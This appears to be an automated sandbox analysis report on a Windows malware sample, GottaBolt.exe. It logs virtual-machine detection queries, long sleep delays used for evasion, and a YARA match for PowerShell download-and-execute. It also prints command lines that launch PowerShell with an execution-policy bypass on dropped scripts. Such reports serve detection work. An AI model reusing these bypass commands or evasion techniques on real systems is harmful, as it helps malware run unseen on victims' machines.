Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\GottaBolt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Source: C:\Users\user\Desktop\GottaBolt.exe	Memory allocated: 252F8770000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Memory allocated: 252FA2D0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3410	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6370	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5494	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1598	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1266	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1347	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1975
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 826

Source: C:\Users\user\Desktop\GottaBolt.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe TID: 5080	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe TID: 1120	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep count: 3410 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep count: 6370 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680	Thread sleep count: 1975 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep count: 686 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016	Thread sleep count: 1930 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072	Thread sleep count: 826 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\GottaBolt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V magoeokhhftjckr Bus+
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V magoeokhhftjckr Bus Pipesd
Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root PartitionTr
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service%
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: GottaBolt.exe, 00000000.00000002.2639466093.00000252F8814000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V HypervisorF
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: GottaBolt.exe, 00000000.00000002.2644833848.00000252FC110000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(I
Source: powershell.exe, 00000008.00000002.4198513768.000001E8F5456000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Servicett

Source: C:\Users\user\Desktop\GottaBolt.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4428.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: GottaBolt.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1, type: DROPPED

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\GottaBolt.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"

Source: C:\Users\user\Desktop\GottaBolt.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "

Source: powershell.exe, 00000008.00000002.3942045111.000001E8DE5AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DED42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DE84A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerP
Source: powershell.exe, 00000008.00000002.3942045111.000001E8DE22F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2
Source: powershell.exe, 00000008.00000002.3934967783.000000411FACA000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager Chrome

Source: C:\Users\user\Desktop\GottaBolt.exe	Queries volume information: C:\Users\user\Desktop\GottaBolt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
